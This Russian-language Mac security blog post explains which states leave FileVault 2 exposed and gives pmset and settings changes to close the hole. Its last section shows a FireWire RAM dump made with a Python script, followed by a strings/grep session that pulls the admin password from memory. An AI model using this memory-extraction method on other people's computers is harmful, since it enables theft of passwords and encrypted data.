Взлом FileVault 2 — часть 1 — короткая
Безопасность | Автор: Владислав Сикорский Оставить коментарийСуществует некоторый вопрос о степени в которой FileVault 2 уязвим для атак. Мы провели некоторые исследования, и можем поделится результатами. Как оказалось в результате наших исследований операционная система Mac OS «из коробки», даже при включенном FileVault 2 не спасет ваши данные от взлома. Но с помощью некоторых мер, мы можем закрыть эту уязвимость.
Мы уже писали как настроить FileVault и писали что эта функция шифрованния диска на 99.9% убережет ваши данные. Но как говориться Apple доверяй, но сам проверяй. Вот в таких мыслях и экспериментах родилась эта заметка. Статья «Взлом FileVault 2″ условно поделена на 2 части. В первой части мы вкратце рассказали какие состояния компьютера наиболее уязвимы для взлома, как настроить безопасность Mac чтобы свети до минимума попытки злоумышленников и в кратце пробежались по методу собственно взлома. Во второй части статьи «Взлом FileVault 2″, для опытных пользователей и любопытных Mac юзеров мы написали подробный отчет, что скорее всего будет интересно многим.
Как защититься от взлома FileVault 2?
Получить пароль администратора из оперативной памяти в операционной системе Mac OS можно в большинстве случаев когда система использует настройки по умолчанию. Но, мы хочтим отметить, что это определенно не фатальный недостаток в FileVault 2, и довольно просто предостеречь эти нападения. К сожалению, операционная система Mac OS не защищена по умолчанию.
Вот краткое изложение того, какие режимы загрузки восприимчивы к атаке:
(Схема кликабельна)
Защититься от атак довольно просто (при условии, что FileVault включен), вам надо поменять всего три настройки (быстрое переключение пользователей, и пару настроек в режиме сна). Этого будет достаточно чтобы защищать систему, если компьютер находится в режиме сна и если вы еще не вошли в систему.
Как показано на схеме выше, получить доступ к вашим данным можно с помощью быстрого переключения пользователей, поэтому для начала выключим эту функцию. Для этого:
1) Зайдите в Системные настройки->Пользователи и группы.
2) Если замок закрыт, и вы не можете вносит изменения, нажмите на него и введи пароль администратора.
3) Нажмите на кнопку «Параметры входа»
4) Снимите галочку «Показать меню быстрого переключение пользователей как:»
Эта галочка, в большинстве случаев может стоять если у вас несколько пользователей
Изменяем настройки режима сна. Эти параметры должны быть изменены из командной строки, в качестве корневого пользователя, используя «pmset» команды. Если вы неуверенный пользователь командной строки, лучше обратитесь в сервисный центр Apple.
Есть два релевантных способа:
Команда | Значение | Описание |
destroyfvkeyonstandby | 1 | Удаляет полный ключ шифрования тома из памяти, когда система переходит в режим ожидания. Зависит от величины hibernatemode. |
hibernatemode | 25 | Заставляет систему сразу записать содержимое оперативной памяти на диск и отключите питание |
К примеру: sudo pmset -a destroyfvkeyonstandby 1 hibernatemode 25
Как взломать FileVault 2?
Мы использовали Freddie Witherden’s libforensic1394 библиотеки чтобы подключиться через FireWire и снять дамп оперативной памяти в бинарный файл. Мы нашли сценарий, который использовал библиотеки для выполнения дампа, скрипт написанн на Python. Скрипт также может (проверено и подтверждено) снимать дампы с Windows 7, и даже с Linux 2.6 при наличии в компьютере Firewire. Сценарий доступен тут.
Теперь все что нам осталось — снять дамп оперативной памяти и узнать пароль:
MacBook-Pro:~ andrey$ sudo -s
Password:
bash-3.2# /Users/andrey/Desktop/Skript.py 1024 f
SBP-2 not used, forcing 2048 byte pages.
[]
Attempting to access device 0: Apple Computer, Inc. Macintosh
Wrote file ramdump.bin.
bash-3.2# strings ramdump.bin |grep --after-context=3 managedUser \
> |grep --after-context=1 password
password
linx-servise
shell
--
password
shell
bash-3.2#
Пароль будет обозначен красным цветом
В заключение можем порекомендовать прочитать статьи по безопасности:
- Как создать зашифрованную флешку в Mac OS X
- Включаем FileVault 2 или защищаем файлы Mac OS
- Безопасность в сети: Скрываем свое местоположение или как скрыть ip адрес
- Дисковая утилита (часть 3) работа с образами дисков .dmg (здесь описано как создать зашифрованный образ диска)
- Флеш-накопители с аппаратным шифрованнием от Kingston
- Как защитить свои данные или локальная безопасность Mac OS
- Как не потерять данные при краже или сбое компьютера
- Как создать хороший пароль? Работа со «Связкой ключей» (Часть 1)
- Работа со связкой ключей (часть 2)
- Работа со связкой ключей (часть 3)- Продвинутый пользователь
- Взлом связки ключей Keychain Mac OS
Последние комментарии